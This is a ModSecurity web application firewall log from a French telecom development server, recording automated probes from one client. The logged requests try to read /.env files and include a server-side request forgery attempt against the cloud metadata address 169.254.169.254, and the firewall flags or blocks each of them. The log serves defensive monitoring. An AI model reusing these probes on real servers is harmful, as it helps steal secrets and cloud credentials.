[Mon May 11 15:23:34.076918 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.133:47448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTKy-5-wpj6Sx56aZXwAAAAI"]
[Mon May 11 15:23:35.225471 2026] [security2:error] [pid 1320674:tid 1320704] [client 195.178.110.133:47332] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTKO9RdIr1DwxYR2TUAAAAM8"]
[Mon May 11 15:23:35.301519 2026] [security2:error] [pid 1320398:tid 1320406] [client 195.178.110.133:63708] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYV-JEyNRN152ArOSNfwAAAEY"]
[Mon May 11 15:23:35.321422 2026] [security2:error] [pid 1320398:tid 1320406] [client 195.178.110.133:63708] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYV-JEyNRN152ArOSNfwAAAEY"]
[Mon May 11 15:23:35.965053 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:63730] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYV-SQ-m-m0ukSShuCiQAAAUI"]
[Mon May 11 15:23:35.965753 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:63730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYV-SQ-m-m0ukSShuCiQAAAUI"]
[Mon May 11 15:23:36.036661 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:47352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTOJEyNRN152ArOSNcwAAAEg"]
[Mon May 11 15:23:36.535664 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:47430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYS6y-5-wpj6Sx56aZXgAAAAk"]
[Mon May 11 15:23:36.585465 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:63760] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYWKy-5-wpj6Sx56aZbwAAAAY"]
[Mon May 11 15:23:36.585627 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:63760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYWKy-5-wpj6Sx56aZbwAAAAY"]
[Mon May 11 15:23:37.120494 2026] [security2:error] [pid 1319885:tid 1319890] [client 195.178.110.133:47446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTFchVQ3tCn0m9OpZqQAAAQI"]
[Mon May 11 15:23:37.233163 2026] [security2:error] [pid 1320674:tid 1320697] [client 195.178.110.133:47416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTKO9RdIr1DwxYR2TUQAAAMc"]
[Mon May 11 15:23:37.299603 2026] [security2:error] [pid 1319998:tid 1320008] [client 195.178.110.133:47510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTKt2WtvoFr7xvGzVYgAAAIg"]
[Mon May 11 15:23:37.736468 2026] [security2:error] [pid 1320398:tid 1320402] [client 195.178.110.133:47360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYS-JEyNRN152ArOSNcgAAAEI"]
[Mon May 11 15:23:38.311705 2026] [security2:error] [pid 1319953:tid 1319961] [client 195.178.110.133:47388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYS-SQ-m-m0ukSShuCegAAAUY"]
[Mon May 11 15:23:38.333129 2026] [security2:error] [pid 1319885:tid 1319907] [client 195.178.110.133:47518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTFchVQ3tCn0m9OpZqgAAAQw"]
[Mon May 11 15:23:38.385703 2026] [security2:error] [pid 1320674:tid 1320694] [client 195.178.110.133:63784] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYWqO9RdIr1DwxYR2TYwAAAMQ"]
[Mon May 11 15:23:38.385895 2026] [security2:error] [pid 1320674:tid 1320694] [client 195.178.110.133:63784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYWqO9RdIr1DwxYR2TYwAAAMQ"]
[Mon May 11 15:23:39.509259 2026] [security2:error] [pid 1319998:tid 1320016] [client 195.178.110.133:47400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTKt2WtvoFr7xvGzVZQAAAJA"]
[Mon May 11 15:23:40.120088 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:47516] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTOJEyNRN152ArOSNdQAAAFU"]
[Mon May 11 15:23:40.297202 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:47398] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTOSQ-m-m0ukSShuCfgAAAUk"]
[Mon May 11 15:23:41.653173 2026] [security2:error] [pid 1319885:tid 1319895] [client 195.178.110.133:33542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYXVchVQ3tCn0m9OpZwQAAAQY"]
[Mon May 11 15:23:41.653347 2026] [security2:error] [pid 1319885:tid 1319895] [client 195.178.110.133:33542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYXVchVQ3tCn0m9OpZwQAAAQY"]
[Mon May 11 15:23:41.698319 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:33566] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYXat2WtvoFr7xvGzVfwAAAIw"]
[Mon May 11 15:23:41.698518 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:33566] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYXat2WtvoFr7xvGzVfwAAAIw"]
[Mon May 11 15:23:41.798235 2026] [security2:error] [pid 1319953:tid 1319960] [client 195.178.110.133:47584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTeSQ-m-m0ukSShuCfwAAAUU"]
[Mon May 11 15:23:42.878126 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:47500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTKO9RdIr1DwxYR2TUgAAANE"]
[Mon May 11 15:23:45.112943 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:33586] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYYay-5-wpj6Sx56aZcwAAABE"]
[Mon May 11 15:23:45.113117 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:33586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYYay-5-wpj6Sx56aZcwAAABE"]
[Mon May 11 15:23:45.174655 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:33602] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYYVchVQ3tCn0m9OpZxQAAAQk"]
[Mon May 11 15:23:45.174866 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:33602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYYVchVQ3tCn0m9OpZxQAAAQk"]
[Mon May 11 15:23:45.248234 2026] [security2:error] [pid 1320398:tid 1320417] [client 195.178.110.133:47824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYUOJEyNRN152ArOSNeQAAAFE"]
[Mon May 11 15:23:45.826228 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:47838] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYUKy-5-wpj6Sx56aZZwAAABA"]
[Mon May 11 15:23:48.163603 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:33626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYZKt2WtvoFr7xvGzVggAAAIM"]
[Mon May 11 15:23:48.164334 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:33626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYZKt2WtvoFr7xvGzVggAAAIM"]
[Mon May 11 15:23:48.525690 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:63588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYVFchVQ3tCn0m9OpZugAAARA"]
[Mon May 11 15:23:48.700219 2026] [security2:error] [pid 1319885:tid 1319889] [client 195.178.110.133:47734] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYTlchVQ3tCn0m9OpZtAAAAQE"]
[Mon May 11 15:23:49.481042 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:63628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYVKO9RdIr1DwxYR2TXgAAAMg"]
[Mon May 11 15:23:51.242861 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:34694] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYZ6O9RdIr1DwxYR2TcAAAANc"]
[Mon May 11 15:23:51.243072 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:34694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYZ6O9RdIr1DwxYR2TcAAAANc"]
